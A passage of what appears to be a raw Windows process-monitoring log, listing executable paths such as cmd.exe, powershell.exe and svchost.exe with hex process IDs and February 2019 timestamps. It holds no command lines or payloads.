21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xcac2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x17702019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0x53c2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16e82019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11dc2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 